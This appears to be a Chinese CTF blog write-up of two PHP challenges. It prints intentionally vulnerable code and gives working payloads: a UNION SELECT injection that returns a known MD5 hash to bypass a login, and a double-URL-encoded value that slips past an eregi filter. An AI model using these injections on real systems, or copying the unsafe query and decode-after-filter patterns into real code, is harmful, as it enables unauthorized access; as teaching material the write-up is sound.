密码MD5比较绕过和urldecode二次绕过

发表于 | 分类于 | 阅读次数:

一、密码MD5比较绕过

<?php

//配置数据库
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********, "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 

//赋值

$user = $_POST[user];
$pass = md5($_POST[pass]);

//sql语句

// select pw from php where user='' union select 'e10adc3949ba59abbe56e057f20f883e' # 

// ?user=' union select 'e10adc3949ba59abbe56e057f20f883e' #&pass=123456

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];

  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

//如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。


echo “

Logged in! Key:**

“;
}
else {
echo(“

Log in failure!

“);

  }
}
?>

分析这句sql语句可以知道,我们不能直接注释掉密码

$sql = "select pw from php where user='$user'";

继续分析源码我们可以发现只要让row[pw]的值与pass经过md5之后的值相等即可,用union select来返回一个已知明文的md5
payload=

' union select 'e10adc3949ba59abbe56e057f20f883e' #&pass=123456`

二、urldecode二次绕过

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>

审计源码

eregi()函数

字符串比对解析,与大小写无关。
语法: eregi(string pattern, string string, array [regs]);
返回值: 整数/数组
特点:PHP函数eregi()与大小写无关,类似函数ereg() 则区分大小写
例:if (eregi(“C”,”abcdef”)   //true

要想得出flag我们即要求id不能等于hackerDJ,又要要求id的urldecode解码等于id
因此我们需要进行两次编码: h –> %68 –> %2568

构造url: index.php?id=%2568ackerDJ

提交即可获得flag:  

0%